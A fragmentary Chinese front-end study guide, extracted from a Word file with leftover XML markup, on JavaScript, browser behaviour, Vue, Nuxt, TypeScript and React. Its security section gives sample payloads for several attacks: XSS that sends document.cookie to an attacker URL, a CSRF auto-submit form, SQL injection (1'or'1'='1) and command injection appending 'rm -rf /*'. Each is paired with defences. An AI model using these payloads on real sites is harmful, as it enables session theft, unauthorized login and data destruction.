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原生js方面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1.什么是闭包：闭包是能够访问另一个函数作用域的函数，一般是在函数内部返回一个函数，返回的函数引用外部函数的变量，形成闭包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2.Js原型连：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每个函数都有一个prototype属性，当new一个对象的时候每个对象都会继承prototype里面的属性，每个实例里面有一个__proto__ 属性指向prototype，函数构造函数指向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Person === Person.prototype.constructor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在查找属性的时候会先查找实例上面的属性，在查找原型链上面的属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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原型链继承：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inherits(Child, Parent)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() {};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F.prototype = Parent.prototype;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Child.prototype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  Child.prototype.constructor = Child;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33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330" w:righ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js判断数组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Array.isArray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 instanceof Array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arr.__proto__ == Array.prototype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30" w:leftChars="0" w:right="0" w:rightChars="0" w:firstLine="180" w:firstLineChars="10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arr.__proto__.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constructor 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== Array </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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210"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浏览器方面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重排重绘：在浏览器中改变几何属性就会触发重新构建渲染树（先触发重排：负责几何属性的更新，在触发重绘：负责样式更新）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几何属性的更新：</w:t>
      </w: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添加删除元素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元素位置改变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元素尺寸改变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元素内容改变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页面渲染器初始化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浏览器窗口大小发生改变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优化：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多次css修改合并为 一次修改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改用class类更新样式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隐藏元素，修改后，再显示元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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将元素保存在fragment中再插入替换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两个页面间的通信方式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WebSocket，接口支持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cookie/localStorage/sessionStorage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//page1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localStorage.setItem('message',JSON.stringify({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message: '消息'，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from: 'Page 1',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date: Date.now()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//pageb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window.addEventListener("storage", function(e)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console.log(e.key, e.newValue, e.oldValue)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indexDB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//创建数据：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request = indexedDB.open('myDatabase', 3);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db = e.target.result;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tx = db.transaction('Users','readwrite');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tx.objectStore('Users');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保存数据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reqAdd = store.add({'userId': 1, 'userName': '李白', 'age': 24});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reqAdd.addEventListener('success',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console.log('保存成功')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//获取数据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request = indexedDB.open('myDatabase', 3);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request.addEventListener('success',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db = e.target.result;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tx = db.transaction('Users','readwrite');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tx.objectStore('Users');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获取数据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reqGet = store.get(1);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reqGet.addEventListener('success', e =&gt;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console.log(this.result.userName);    // 李白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postMessage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在主页发送消息：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iframe = document.getElementById('iframe_id');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iframe_cw = iframe.contentWindow;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window.onload = function(){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iframe_cw.postMessage({height:"300px"}, "*"); //通信 * 可以指定域名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//子页面接受：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window.addEventListener('message', function (event)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document.getElementById('messageHTML').innerText = event.data.height;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//子页面发送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event.source.postMessage({height:c_h}, 'http://127.0.0.1');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 false);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window.open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，iframe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Broadcast Channel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//Page1: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channel = new BroadcastChannel("channel-BroadcastChannel");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channel.postMessage('Hello, BroadcastChannel!')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//page2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channel = new BroadcastChannel("channel-BroadcastChannel");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channel.addEventListener("message", function(ev)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console.log(ev.data)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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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xss ：如果网页可以运行外部输入的脚本，黑客会运行一个自己的脚本例如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&lt;scritp src=’....index.js’&gt;&lt;/script&gt; (http://locahost:8080?from=&lt;scritp src=’....index.js’&gt;&lt;/script&gt; 可以把这个连接搞成短链形式欺骗用户)  index.js 里面：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image = new Image(); image.src=’http://loadhost:4000/img?c=’+document.cookie,发送一个请求到黑客服务器，可以用nodejs和中间件取得cookie，然后黑客就去目标网站直接在浏览器里面输入document.cookie=cookir  就可以完全模拟用户登录了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还有一个可能是在评论里面注入例如：发表一个评论：我来了&lt;scritp src=’....index.js’&gt;&lt;/script&gt;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所有登录这个网站看到这个评论的人的cookie信息会被窃取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防范措施：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1.一般来说这种攻击框架层面上就已经有防范了。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2.ctx.set(“X-XSS-Protection”,0),浏览器自动拦截3. ctx.set('Content-Security-Policy', "default-src 'self'") 只加载本站的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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通过写函数转换&lt; &gt; &amp; 等符号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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通过xss库转换 var xss = require(‘xss’);  var html = xss(“&lt;h1&gt;&lt;/h1&gt;&lt;script&gt;*****&lt;/script&gt;”)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设置httpOnly:true,表示不能通过控制台修改cookie   app.use(session({httpOnly:true}, app));  另外一种设置方式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Response.addHeader(“set-cookie”,”uid-112;path=/ HttpOnly”)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csrf  跨站伪造请求，意思是在a网站没有退出的情况下，b网站利用&lt;form name="form" action="http://localhost:3000/updateText" method="post" target=“csrf”&gt; 添加评论: &lt;input type="text" name="text" value="CSRF评论。。" /&gt; &lt;/form&gt;   然后提交 document.querySelector('form').submit();  这里action请求就会带上cookie请求成功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防范：1可以用 头信息里的 referer（请求来源），但是这个方案不太爱完美2.验证码方式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点击劫持，黑客通过在自己的网站上加上目标网站的iframe连接，经过精确定位控制目标网站的按钮在诱导按钮上面。隐藏iframe，点击诱导按钮就点击了目标网站的功能了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防范：中间键中加载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app.use(async (ctx, next)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await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sql注入：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填⼊特殊密码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1'or'1'='1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拼接后的SQL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SELECT *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FROM test.user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WHERE username = 'laowang'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AND password = '1'or'1'='1'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这样就可以不用密码也登录了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防范：一般调用封装好的方法：query(‘SELECT * FROM WHERE ID=?’,PASSWORD)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OS 攻击 一般执行shell 命令的时候有可能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例如执行下面这个exe(‘ git clone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"http://***"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http://***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&amp;&amp; rm -rf  &amp;&amp; /’)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DNS劫持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顾名思义，DNS服务器(DNS解析各个步骤)被篡改，修改了域名解析的结果，使得访问到的不是预期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防范：升级https、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7.DDOS 攻击 分布式拒绝访问攻击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DDOS 不是⼀种攻击，⽽是⼀⼤类攻击的总称。它有⼏⼗种类型，新的攻击⽅法还在不断发明出来。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⽹站运⾏的各个环节，都可以是攻击⽬标。只要把⼀个环节攻破，使得整个流程跑不起来，就达到了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瘫痪服务的⽬的。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其中，⽐较常⻅的⼀种攻击是 cc 攻击。它就是简单粗暴地送来⼤量正常的请求，超出服务器的最⼤承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受量，导致宕机。我遭遇的就是 cc 攻击，最多的时候全世界⼤概20多个 IP 地址轮流发出请求，每个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地址的请求量在每秒200次~300次。我看访问⽇志的时候，就觉得那些请求像洪⽔⼀样涌来，⼀眨眼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就是⼀⼤堆，⼏分钟的时间，⽇志⽂件的体积就⼤了100MB。说实话，这只能算⼩攻击，但是我的个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⼈⽹站没有任何防护，服务器还是跟其他⼈共享的，这种流量⼀来⽴刻就下线了。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防御⼿段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以 Node.js 为例，假如在接⼝中需要从 github 下载⽤户指定的 repo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const exec = require('mz/child_process').exec;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let params = {/* ⽤户输⼊的参数 */};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exec(`git clone ${params.repo} /some/path`);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https://github.com/xx/xx.git &amp;&amp; rm -rf /* &amp;&amp;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备份⽹站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备份⽹站不⼀定是全功能的，如果能做到全静态浏览，就能满⾜需求。最低限度应该可以显示公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告，告诉⽤户，⽹站出了问题，正在全⼒抢修。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HTTP 请求的拦截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硬件 服务器 防⽕墙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带宽扩容 + CDN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>以上的配置项目可以用一个插件配置：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const helmet = require('koa-helmet')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app.use(helmet())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8.md5sh1加密写法：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crypto = require('crypto')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hash = (type, str) =&gt; crypto.createHash(type).update(str).digest('hex')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md5 = str =&gt; hash('md5',str)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sha1 = str =&gt; hash('sha1',str)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encryptPassword = (salt, password) =&gt; md5(salt + 'abced@#4@%#$7' + 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psw = '11111'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console.log('md5', md5(psw))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console.log('sha1', sha1(psw))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encryptPassword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注意加盐salt 和中间字段 提高安全性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人机验证：验证码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express = require('express');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createCanvas, loadImage } = require('canvas');//用canvas画图，最后最后返回两张图片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path = require('path');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express();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app.use(express.static(__dirname + '/'))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Canvas()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createCanvas(...arguments)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背景图片的宽可以传参设置，默认值是320 * 180，小拼图默认是60 * 45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app.get('/drag_captcha', async (req, res)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bgWidth: width } = req.query;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bgWidth = parseInt(width) || 320;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bgHeight = (width &amp;&amp; parseInt(width * 180 / 320)) || 180;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dragPicWidth = 60;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dragPicHeight = 45;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index = Math.floor(Math.random() * 13);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positionX = Math.floor(Math.random() * (bgWidth - dragPicWidth - 10) + 11);  // 空白拼图的定位X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positionY = Math.floor(Math.random() * (bgHeight - dragPicHeight - 10) + 11);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bgCanvas = new Canvas(bgWidth,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dragCanvas = new Canvas(dragPicWidth,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background = bgCanvas.getContext('2d');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 = dragCanvas.getContext('2d');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image = await loadImage('bg.jpg')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background.drawImage(image, 0, 0, 320, 180, 0, 0, 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dragPic.drawImage(bgCanvas, positionX, positionY, dragPicWidth, dragPicHeight, 0,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background.clearRect(positionX, positionY, dragPicWidth, dragPicHeight);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//挖图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(req.session)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//位置保全在session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req.session.dragCaptcha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positionX,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res.send({ bgCanvas: bgCanvas.toDataURL(), dragCanvas: dragCanvas.toDataURL()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http是用明文传输的所以不太安全，现在全球都在向https转译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https有三个优点1.保密2.完整3.真实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https= http+ssl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ssl:对称秘钥和不对称秘钥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对称加密是加密解密两个秘钥都是一样的，缺点是很容易被破解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不对称加密在加密过程中产生一对秘钥，公钥和私钥，公钥负责加密，私钥负责解密，缺点是加密过程非常消耗资源，不能作为大数据传输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Ssh验证过程git的登录过程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31070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申请证书:在阿里云直接申请证书 申请，放到nginx中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770" cy="25463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一般情况下把公钥放到服务器的.ssh 目录下面的authorized_keys文件夹中。如果是阿里云的服务器可以在创建的过程中上传公钥，会自动放到系统中的authorized_keys中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谁有私钥谁就被认证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https验证过程：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5420" cy="318643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829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无头浏览器技术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Pupperter 可以用于爬虫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设计模式：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订阅/发布模式:例如vue中的事件this.$emit(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eventname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1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单例模式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:例如弹框，无论弹出多少次，都是一个实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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⼯⼚模式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：函数每次调用放回一个类的新的对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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策略模式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：用一个变量贮存方法方便调用，例如表单验证的时候用一个对象strategies，存方法：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strategies =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isNonEmpty: function( value, errorMsg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 value === ''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errorMsg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minLength: function( value, length, errorMsg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 value.length &lt; length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errorMsg;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isMobile: function( value, errorMsg ){ // ⼿机号码格式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 !/(^1[3|5|8][0-9]{9}$)/.test( value ) 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errorMsg;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代理模式：对一个对象提供⼀个代⽤品或占位符，以便控制对它的访问，例如es6的proxy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中介者模式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：通过⼀个中介者对象，其他所有的相关对象都通过该中介者对象来通信，vuex，redux都是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装饰器模式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：：在不改变对象⾃身的基础上，在程序运⾏期间给对象动态地添加⽅法例如react的高阶组件</w:t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适配器模式：适配器模式的作⽤是解决两个软件实体间的接⼝不兼容的问题。例如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googleMap = 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show: function(){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 '开始渲染⾕歌地图' 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baiduMapAdapter = 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show: function(){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baiduMap.display();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renderMap( googleMap ); // 输出:开始渲染⾕歌地图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renderMap( baiduMapAdapter ); // 输出:开始渲染百度地图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外观模式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：外观模式即让多个⽅法合并到一个，例如事件的处理：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addEvent(dom, type, fn)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 (dom.addEventListener)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dom.addEventListener(type, fn, false);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 else if (dom.attachEvent)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dom.attachEvent('on' + type, fn);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 else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dom['on' + type] = fn;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10.模板⽅法模式：模板⽅法模式在⼀个⽅法中定义⼀个算法的⻣架，⽽将⼀些步骤的实现延迟到⼦类中，例如：这个我们⽤的很多，vue中的slot，react中的children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性能问题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js统计页面加载时间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window.onload = function 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var loadTime = window.performance.timing.domContentLoadedEventEnd-window.performance.timing.navigationStart;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console.log('Page load time is '+ loadTime);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五：vue课程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官方组件应用名字规范是，首字母大写，后面每个单词首字母大写，用的时候首字母小写，单词小写，单词间连接用-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例如：import HelloWorld from “./componnets/helloword.js”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应用&lt;hello-word&gt;&lt;/hello-word&gt;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2.属性展开符号：复制一个对象的{...item}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3.input type=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checkbox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v-model=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绑定是否选中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4.props里面是对象或者是数组的话，组件里面改是没有问题的，但是不太建议这样做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一般情况下是通过父亲组件来删除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vue里面删除数组里面的某一项arr.splice(index,1)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组件化，一切皆组件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Elementui：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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可以用vue add element 在已经有的项目上面添加ui库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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element按需加载：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Vue from ‘vue’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{Button}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element-ui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Vue.use(Button)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组件化：编写自己的组件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v-model的实现方式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&lt;input :type="type" :value="value" @input="onInput"&gt;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props:{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value:{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default:'text'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methods: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onInput(e)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let value = e.target.value;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this.$emit('input',value);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this.$parent.$emit('validate')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&lt;k-input :value=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@input=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value=arguments[0]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&gt;&lt;/k-input&gt;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相当于v-model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vue中的跨组件传输数据通常用provide 和 inject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在父组件的data同级下写：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provide(){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val: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 is a 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子组件在data同级中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inject:[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子组件发送事件可以用this.$parent.$emit(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在父组件中通过this.$on(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)接收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 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Src/router.js 下面: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Vue.use(router)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home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./views/home.vue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挂载：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 是一个非常重要的组件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匹配路由的组件会放到这个占位符上面渲染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history模式对于seo比较有利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 router-link相当于a用于跳转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To关键属性一定要有。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另个的用法:&lt;router-link :to=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pageA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动态路由传参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获取参数：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"http://localhost/b/123?Name=zhanghsng"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http://localhost/b/123?Name=zhanghsng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],//路由上配置了  Props:true,，就可以仔组件中props中得到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Created(){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Console.log(this.$router.params.id)//123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Console.log(this.$router.query.name)//zhangshang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这个情况需要在home中加上&lt;router-view&gt;&lt;/router-view&gt;成为二级路由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两个&lt;router-view&gt;的情况下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Compontents:{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Default:home,//渲染在第一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A:list//渲染第二个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全局守卫,Router=new Router({})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//判断如果没有登录可以在这个地方跳转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//next(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Router.beforeResolve((to,from,next)=&gt;{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//就是执行时间比routerEach慢一点其他的一样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//这个可以不用next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Router.afterEach((to,from,next)=&gt;{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路由里部守卫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beforeEnter(to,from,next){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//在beforeEach之后，beforeResolve之前执行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组件内部守卫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beforeRouteEnter(to,from,next){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beforeRouteUpdate(to,from,next){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beforeRouteLeave(to,from,next){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一次路由过程的具体的执行顺序是beforeEach beforeEnter beforeRouteEnter beforeResolve  afterEach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异步组件按需加载(首页除外)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Component:()=&gt;import(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./views/page.vue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Store.js里面：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vuex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State:{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Count:1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Mutations:{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Add(state){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State.count++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Actions:{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Add({commit}){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)//触发Mutations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this.$store.dispath(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)//触发actions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//导入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Store,//赋值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{mapActions}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Methods:{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...mapActions([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vuex多文件Modules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cfrom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module2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./module2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Modules:{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Module1:module1,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Module2:module2,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//注意module1和module2要加上字段namespaced：true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vuex的原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="105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在vue.use(Vuex)的时候调用vuex中的install方法，执行代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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Vue.mixin({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beforeCreate()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//所有组件的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beforeCreate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钩子都会执行这个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(this.$options &amp;&amp; this.$options.store) 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//找到根组件 main 上面挂一个$store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this.$store = this.$options.store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 console.log(this.$store);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//非根组件指向其父组件的$store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this.$store = this.$parent &amp;&amp; this.$parent.$store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可见，store注入 vue的实例组件的方式，是通过vue的 mixin机制，借助vue组件的生命周期 钩子 beforeCreate 完成的。即 每个vue组件实例化过程中，会在 beforeCreate 钩子前调用 vuexInit 方法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，在组件中添加了$store变量，然后：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>// store._vm._data.$$state = store.state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store._vm = new Vue({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data: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  $$state: state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  computed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A1A1A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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shd w:val="clear" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105"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添加一个对象，把$store.state变成一个vue对象，现实全局的响应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Vue3.0新特性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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体积减少到10k</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="21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Object.defineProperty -&gt; Proxy，proxy不需要对原始对象做太多操作，减少复杂度，增加可维护性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var target =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name: 'poetries'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logHandler =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get: function(target, key)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console.log(`${key} 被读取`);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target[key];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set: function(target, key, value) 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console.log(`${key} 被设置为 ${value}`);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target[key] = value;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var targetWithLog = new Proxy(target, logHandler);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targetWithLog.name; // 控制台输出：name 被读取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targetWithLog.name = 'others'; // 控制台输出：name 被设置为 others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console.log(target.name); // 控制台输出: others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3.更换成typescript来编写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Vue.$nextTick原理：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通常nextTick用于数据赋值后，又想立刻取到dom更新的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属于微任务更新的，但是有兼容问题，会降级到宏任务setTimeout中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降级顺序：Promise &gt; MutationObserver &gt; setImmediate &gt; setTimeout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MVVM 是Model-View-ViewModel 的缩写，Model 层代表数据模型，也可以在Model中定义数据修改和操作的业务逻辑；View 代表UI 组件，它负责将数据模型转化成UI 展现出来，ViewModel 是一个同步View 和 Model的对象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vue双向绑定对数组的拦截：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obarr =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arrayProto = Array.prototype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arrayMethods = Object.create(arrayProto)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Object.defineProperty(arrayMethods,'push',{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value:function mutator(){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//缓存原生方法，之后调用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original = arrayProto['push']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args = Array.from(arguments)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original.apply(this,args)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console.log(obarr)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obarr.__proto__ = arrayMethods;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选择一个合适的ui库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有一下几个要点：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维护团队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迭代更新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Github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测试覆盖率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优点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缺点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搭建vue项目0到1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vue-cli3 创建项目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vuex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 ui库引用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5.如果路由需要做登录的验证：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可以在router里面添加标记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Meta:{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Auth:true//表示需要验证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在router.js里面写全局路由守卫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If(to.meta.auth){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token = localStorage.getItem(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)//令牌存在本地肯定不安全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//但是前端本来就没有绝对安全的策略，只能通过后端减少token的生效时间来预防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If(token){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Next({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Query:{ redirect:to.path }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跳到login.vue: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this.$store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.dispatch("login", this.model)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.then(code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登录成功重定向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到登录前页面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path = this.$route.query.redirect || "/";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this.$router.push(path);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.catch(error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有错误发生或者登录失败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toast = this.$createToast({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time: 2000,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txt: error.message || error.response.data.message || "登录失败",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 "error"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toast.show();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//调用store方法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 from "vue";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Vuex from "vuex";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us from "./service/user";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isLogin: localStorage.getItem('token') ? true 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setLoginState(state, b)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state.isLogin = b;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login({ commit }, user)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登录请求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us.login(user).then(res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{ code, token } = res.data;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登录成功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变更状态记录token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commit("setLoginState", true);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localStorage.setItem("token", token);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//给每个请求加上token，用于后端判断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用于拦截请求和响应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axios = require('axios')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function(vm){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设置请求拦截器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axios.interceptors.request.use(config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获取token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token = localStorage.getItem('token')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(token) { // 如果存在令牌这添加token请求头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config.headers.Authorization = 'Bearer ' + token;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config;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响应拦截器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参数1表示成功响应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这里只关心失败响应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axios.interceptors.response.use(null, err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(err.response.status === 401) { // 没有登录或者令牌过期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清空vuex和localstorage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vm.$store.dispatch("logout");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跳转login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vm.$router.push("/login");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Promise.reject(err);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interceptor from './interceptor'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store,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render: h =&gt; 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}).$mount('#app')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执行拦截器初始化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interceptor(app);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Vue国际化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vue-i18n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，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Src新建文件夹vueI18n6，新建文件index.js,en.js，zh.js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'vue-i18n'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'element-ui/lib/locale/lang/en'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'element-ui/lib/locale/lang/zh-CN'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'element-ui/lib/locale'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'./en.js'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'./zh.js'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enLocale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zhLocale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set locale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set locale messages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ElementLocale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En.js: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Zh.js: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'你好'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Main.js 添加引用：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'./vueI18n6/index.js'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Store添加全局方法：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||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'zh'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mutations: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setLang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$i18n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dailog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切换语言：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'setLang'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调用方法：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bearer token 规范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在header头中加入Authorization:Bearer &lt;token&gt;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//登录成功放回令牌：jwt.sign，请求接口检验token ：jwtAuth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后端代码：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Koa = require("koa");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require("koa-router");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生成令牌、验证令牌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 = require("jsonwebtoken");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jwtAuth = require("koa-jwt");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生成数字签名的秘钥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secret = "it's a secret";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Koa();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new Router();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router.get("/api/login",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username, passwd } = ctx.query;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console.log(username, passwd);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(username == "kaikeba" &amp;&amp; passwd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生成令牌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token = jwt.sign(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 name: "kaikeba" }, // 用户信息数据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exp: Math.floor(Date.now() / 1000) + 60 * 60 // 过期时间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secret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token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ctx.status = 401;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0, message: "用户名或者密码错误"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"/api/userinfo",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jwtAuth({ secret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data: { name: "jerry", age: 20 }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app.use(router.routes());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app.listen(3000);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首页做切换的时候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一般的做法是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&lt;transition name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route-move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&lt;router-view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&lt;tab-bar&gt;&lt;/tab-bar&gt;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Tab-bar 改变设置路由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搭建完成基本框架之后就就可以写模块了以goods模块为例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新建一个service文件夹，新建一个goods.js文件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'axios'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getGoodsInfo(){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axios.get('/api/goods')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.then(res=&gt;{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{code, data: goodsInfo, slider, keys} = res.data;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数据处理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(code)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{goodsInfo, slider, keys}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null;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store文件夹下面新建一个goods.js文件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gs from "@/service/goods";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slider: [],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keys: [],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goodsInfo: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setGoodsInfo(state, { slider, keys, goodsInfo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state.slider = slider;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state.keys = keys;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state.goodsInfo = goodsInfo;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getters: { // 添加一个goods属性，转换对象形式为数组形式便于循环渲染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goods: state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state.keys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.map(key =&gt; state.goodsInfo[key])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.reduce((prev, next) =&gt; prev.concat(next), []);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getGoods({ state, commit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(!state.keys.length)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没有数据采去获取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gs.getGoodsInfo().then(goodsInfo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commit('setGoodsInfo', goodsInfo)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18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在调用页面：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mapState, mapActions, mapGetters } from "vuex";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Creaded(){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This.getGoods();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//前面的goods是命名空间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Computed:{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...mapState(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,{slider:state=&gt;{state.goods.slider}}),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...mapGetters(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Methods：{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...mapAction(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getGoods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就可以用store数据了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vue动画</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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用&lt;transition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forward”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&lt;router-view  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包含需要动画的模块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class定义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//进场前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translate3d(-100%, 0, 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 出场后 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.route-forward-leave-to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translate3d(100%, 0, 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//中间激活状态 动画函数的执行方式在这个地方执行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.route-forward-enter-active,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.route-forward-leave-active,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transition: transform 0.3s;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.child-view { // 添加到每个页面上的样式，确保页面间不挤占位置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padding-bottom: 40px;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让浏览器重绘的方法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Document.body.offsetHeight;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vue多实例组件创建方式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function(component,props){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instance = new Vue({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//这个是虚拟dom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h(component,{props})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//生成dom 追加到body中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Document.body.appendChild(instance.$el)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comp = instance.$children[0];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Comp.remove = function(){//销毁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document.body.removeChild(instance.$el)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instance.$destroy();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comp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//调用：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CartAnim from "@/components/CartAnim.vue";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anim = this.$create(CartAnim,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pos: { left: "45%", bottom: "16px"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anim.start(el);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anim.$on("transitionend", anim.remove);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//监听组件事件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Nuxt框架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npx create-nuxt-app abc 表示先安装脚手架子，并且每次运行先安装新版本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然后在创建项目abc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项目中的assets文件夹是需要打包处理的图片，例如base64图片的处理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Static文件夹是放置不用处理的图片的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Nuxt目录下面的page下，新建一个文件就等于新建一个路由了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例如新建user.vue 就可以在浏览器里面输入http://localhost:3000/user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导航用&lt;nuxt-link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/users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&gt;&lt;/nuxt-link&gt;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文件夹users下面的index.vue，是user的路由，其他文字的vue文件就是user/**路由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判断是否是服务端渲染的api：process.server //为true是服务器，false为前端渲染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动态路由_id.vue就会生成user/:id这样的路由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嵌套路由，如果有文件夹同名的vue文件，就会发生嵌套例如：user文件夹下面有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user.vue，那么user文件夹下面的文件都会成为子路由，user.vue中要放置&lt;nuxt-child&gt;&lt;/nuxt-child&gt;  就可以显示嵌套的子路由了，也可以该相关的布局页面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在layout下面新建user.vue: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&lt;h1&gt;这是一个标题&lt;/h1&gt;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&lt;nuxt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然后在page/user.vue 指定布局页面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Layout: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Head：{//可以配置加载css和js文件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Title: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标题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//改变标题，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Async asyncData(){  //nuxt框架下取异步数据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Console.log(process.server)//这个可以判断是否是在服务器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users  = await getUser()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{users} //最终会和data的数据合并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前端跨域问题的配置：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在nuxt.config.js里面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@nuxtjs/axios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Proxy:true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Proxy:{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/api/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http://localhost:3000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异步取数据：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Async asyncData({params，$axios}){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data=await $axios.$get(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/api/users/${params.id}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If(data.ok){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{user:data.user}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路由拦截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nuxt.config.js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plugins: ["@/plugins/element-ui", "@/plugins/router"],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在plugins下加入route.js文件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({app})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app.router.beforeEach((to,from,next)=&gt;{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console.log('我要去：'+to.path);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vuex：nuxt框架有store文件夹就自动启动vuex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在根目录下面加上index.js 代表没有命名空间的数据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state =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mutations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increment(state)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state.counter++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在根目录下面加上user.js 代表user命名空间下面的数据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state =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list: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mutations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set(state, list)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state.list = list;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add(state, name)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state.list.push({ name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触发：this.$store.commit(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user/set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typeScript特点：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类型检查和类型注释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声明文件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创建一个支持ts的vue项目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create vue-ts 选择项目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自定义选项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添加ts支持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基于类组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Eslint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语法：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title:string //类型注解，表示字符串类型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=‘xx’ //这里不会报错，有类型推断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names:string[] //字符串的数组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：Array&lt;string&gt; //字符串的数组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:(string | number)[]//字符串和数字数组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list :any[] //任意类型数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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greeting(person:string):string{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}//参数和返回值的类型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warn():viod{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}//没有返回值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//内置类型 ：string,number,boolean,viod,any,object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vue中ts 的class用法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Component, Prop, Vue, Emit,Watch } from "vue-property-decorator";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Readonly foo:string=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foo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//只读属性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@Prop() private msg!:string=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//数字类型，必填，默认值name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@Prop() private  obj:{foo:string} //带有foo属性的对象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features=[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name2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]//相当于data里面的数据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AddFeature(event:any){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This.features.push(event.target.value)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event.target.value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””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Created(){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//变量前面的修饰符有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类里面可以用，外部访问可以用get set 封装访问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protected 子类也可以用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不写默认public 都可以访问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Animal{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Constructor(private name:string){//相当于定义name属性并且将构造参数赋值给他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//自定义类约束：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class Feature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id: number, public name: string, public version: string) {}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private features: Feature[] = [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,id:1,version:1}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接口约束结构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interface Person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firstName: string;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lastName: string;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sayHello(): string; // 要求实现方法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greeting2(person: Person)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"Hello, " + person.firstName + " " + person.lastName;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//必须有sayHello方法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 = { firstName: "Jane", lastName: "User", sayHello: () =&gt; "lalala" };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console.log(greeting2(user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//类实现接口方法：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Greeter implements Person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firstName = "", public lastName = "") {}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sayHello()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"Hello, " + this.firstName + " " + this.lastName;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user2 = new Greeter("a", "b");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//计算属性的写法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Get featureCount(){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this.features.length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//派发事件：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@Emit()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addFeature(event: any)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若没有返回值形参将作为事件参数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feature =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 event.target.value,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id: this.features.length + 1,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version: "1.0"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this.features.push(feature);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event.target.value = "";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feature; // 返回值作为事件参数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是类里面的方法，可以被click调用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也表示派发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事件，事件参数是返回值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函数参数：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sayhello(name:string,age?:number):string|number{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name+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+age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sayHello(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,20)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sayHello(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//参数没有问号就是必传的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函数重载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info(a:{name:string}):string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info(a:string):object;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info(a:any):any{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If(typeof a===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a.name;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{name:a}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Info({name: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Info(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//两种类型的调用都可以，叫重载，先定义两种接口，在实现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泛型具体类：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Feature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id: number, public name: string, public version: string) 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interface Result&lt;T&gt;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ok: 0 |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data: T[];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泛型函数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getData&lt;T&gt;(): Promise&lt;Result&lt;T&gt;&gt;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data: any[] =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id: 1, name: "类型注解", version: "2.0"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id: 2, name: "编译型语言", version: "1.0"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Promise.resolve({ ok: 1, data } as Result&lt;T&gt;);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result = await getData&lt;Feature&gt;();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this.features = result.data;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装饰器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//如果不加括号就表示下面的是参数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//执行玩装饰器后又返回装饰器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//可以在括号里面直接添加参数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属性也可以在这里配置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sname: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type: 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default: "匿名"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Reat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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什么是jsx？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Jsx是javascript xml表现，用js描述html，每个节点代表一个函数调用，jsx经过webpack babel打包之后就成为虚拟dom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react打包后的代码是react.createElement(dom，app)，所以需要引入react，即使没有用到过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SetState发生了什么？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This.$updater.addClassBack(callback);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This.$updater.addState(nextState)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diff算法策略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同层比较，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先比较类型，类型不一样就直接删除，换上新的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比较属性有没有不同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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再往下递归比较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通过key加快同层查找比较，如果没有key的话只能删除插入了，操作会大大增加</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
